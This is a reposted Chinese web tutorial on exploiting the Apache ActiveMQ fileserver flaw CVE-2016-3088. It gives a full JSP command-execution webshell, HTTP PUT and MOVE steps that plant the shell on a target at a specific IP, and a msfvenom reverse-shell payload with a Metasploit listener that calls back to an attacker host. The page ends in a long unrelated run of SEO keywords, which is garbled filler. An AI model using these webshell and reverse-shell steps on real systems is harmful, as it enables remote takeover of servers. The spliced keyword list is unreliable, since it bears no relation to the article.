Apache ActiveMQ 远程代码执行漏洞 (CVE-
发表于:2024-11-14 作者:千家信息网编辑
千家信息网最后更新 2024年11月14日,简介:2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程***者用恶意代码替代Web应用
千家信息网最后更新 2024年11月14日Apache ActiveMQ 远程代码执行漏洞 (CVE-
简介:2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程***者用恶意代码替代Web应用,在受影响系统上执行远程代码(CVE-2016-3088)。8161端口为web控制台端口,本漏洞就出现在web控制台中。ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:其使用率并不高而且文件操作容易出现漏洞。所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
方法1.直接写shell
访问http://120.79.1.70:8161/fileserver 直接用bp拦截之后把post改成put 在往后面加几行
<%@ page import="java.util.*,java.io.*"%> <% %> <% if ( request.getParameter( "comment" ) != null ) { out.println( "Command: " + request.getParameter( "comment" ) + "
" ); Process p = Runtime.getRuntime().exec( request.getParameter( "comment" ) ); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream( in ); String disr = dis.readLine(); while ( disr != null ) { out.println( disr ); disr = dis.readLine(); } } %>
如下图:chen.txt:
返回204代表成功,之后再把put改成move 后面再加一行
Destination:file:///opt/activemq/webapps/api/s.jsp
最后直接访问 后面加一个api就成功了
方法2.利用 cron 定时任务写 shell
现在kali里面生成一个***
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.199.109 LPORT=9999 r> bing.jsp
再把他上传到桌面进行打开如下图:
之后和之前一样 在第一行的后面添加一行
Destination:file:///opt/activemq/webapps/api/s.jsp
到网站上进行查看有没有
之后打开kali
use exploit/multi/handlerset payload java/jsp_shell_reverse_tcpset lhost 192.168.199.109set lport 9999run
进行监听就成功了!
文件
应用
漏洞
成功
一行
接口
控制台
控制
代码
安全
方法
版本
端口
存储
登录
三个
二进制
人员
代表
任务
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
格力集团软件开发招聘
防城港软件开发制作
电商软件开发加盟商报价方案
戴尔服务器包装箱
怎么用sql查看数据库基本信息
深圳网络安全部门
电脑数据自动备份到服务器
网络安全宣传新春走基层
恶意扰乱网络安全环境的形式
互联网科技 翻译
数据库中distinct
数据库中 数据冗余是指
猪猪视频无法链接服务器
飞翔网络安全知识
江门塑胶模具制造管理软件开发
学习网络技术学什么
当应用网络技术编制建设工程
有没有比较好的网络安全的书
宿州海派软件开发公司
网络安全师需要了解什么
剑灵道具属性在本地还是服务器
格力集团软件开发招聘
加强数据库安全的方法是
服务器后期维修方式
数据库数据加密的意义
软件开发公司退出机制
如何在前台修改数据库信息
x86服务器解剖图
计算机网络技术双语教学是什么
数据库学习壁纸ipad